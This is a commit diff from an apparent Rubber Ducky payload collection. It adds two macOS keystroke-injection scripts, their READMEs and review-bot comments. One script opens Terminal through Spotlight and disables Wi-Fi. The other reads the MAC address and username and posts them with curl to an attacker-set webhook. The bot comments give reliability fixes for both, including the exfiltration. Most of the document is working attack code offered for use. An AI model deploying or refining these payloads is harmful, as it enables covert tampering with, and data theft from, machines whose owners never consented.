Compare commits: ec7987eb8e...e1029b94f0 (7 commits)
Author | SHA1
---|---
&MF#CTg*fWz6H^nV | e1029b94f0
Peaks | 7f56669213
Peaks | 645f1e9fe3
bst04 | 59d4883817
Aleff | 1ea9c8a689
bst04 | b9de56e67d
bst04 | 0403e79d70
@ -0,0 +1,24 @@
# Disable WiFi 🛜
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
### Details
- **Title**: Disable WiFi
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Execution
- **Target**: MacOS
### Dependencies
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
`DEFINE #MODE off`
## How It Works 📜
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Run or stop the WiFi
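Review bot: the "How It Works" steps misdescribe the flow and carry typos. Step 2 has "littebit" (little bit) and a trailing ellipsis; in step 3 the first bullet says the script "Runs commands to open Terminal", whereas the payload in this same change opens Spotlight with GUI SPACE and types TERMINAL, and the second bullet "Run or stop the WiFi" should read "Enables or disables Wi-Fi according to #MODE". The payload also closes Terminal with GUI q at the end, which the README should state. Minor: "MacOS" should be "macOS" throughout, and the Dependencies note should say that #MODE accepts only on or off.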
@ -0,0 +1,53 @@
REM_BLOCK
##################################
# #
# Title : Disable WiFi #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : MacOS #
# #
##################################
END_REM
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
DEFINE #MODE off
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 250
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
DELAY 250
GUI q
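Review bot: the DELAY 250 after STRINGLN TERMINAL leaves a freshly launched Terminal very little time to accept input before the networksetup line is typed; the Exfiltrate payload in this same change uses DELAY 750 at the identical step, so align the two or note why this one is shorter. Two smaller points: the DETECT_READY USAGE block says to place the extension beside ATTACKMODE, yet this payload contains no ATTACKMODE line at all, so either add one or state that the device default is relied upon; and the closing GUI q is not mentioned anywhere in the README's "How It Works" steps, which should list it.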
@ -0,0 +1,25 @@
# Exfiltrate Mac Address - MacOS
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
### Details
- **Title**: Exfiltrate Mac Address
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Exfiltration
- **Target**: MacOS
### Dependencies
- Set the #WEBHOOK to complete the exfiltration
`DEFINE #WEBHOOK example`
## How It Works 📜
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Acquire the mac address and the system user name
- Send this informations through the Webhook
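Review bot: "Mac Address" should be "MAC address" in the title and bullets (as written it reads as the computer rather than the hardware address), and the step-3 bullets need grammar fixes: "Acquire the mac address and the system user name" and "Send this informations through the Webhook" should read "Acquires the MAC address and the current username" and "Sends this information to the webhook". The Dependencies entry DEFINE #WEBHOOK example should state that the value must be the complete webhook URL, because the payload hands it to curl verbatim and a bare "example" will not resolve. Same "littebit" typo and "MacOS" capitalization as in the Disable WiFi README.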
@ -0,0 +1,55 @@
REM_BLOCK
####################################################
# #
# Title : Exfiltrate Mac Address - MacOS #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : MacOS #
# #
####################################################
END_REM
REM Set the #WEBHOOK to complete the exfiltration
DEFINE #WEBHOOK example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 750
STRINGLN mac=$(networksetup -getmacaddress en0)
DELAY 750
STRINGLN name=$(id -un)
DELAY 850
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
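Review bot: `mac=$(networksetup -getmacaddress en0)` captures the command's whole output line rather than just the address, so the posted content field will carry the surrounding label text; either document that or note that en0 is hardcoded with no fallback when Wi-Fi is not en0. The default `DEFINE #WEBHOOK example` is not a URL, so the curl fails out of the box; an obviously-placeholder URL such as https://WEBHOOK-URL-HERE makes the required value clear. Unlike the Disable WiFi payload in this same change, this one has no ATTACKMODE line and never closes Terminal (no GUI q), so the Terminal window with the typed curl line stays on screen after the payload finishes; the README should document that behaviour.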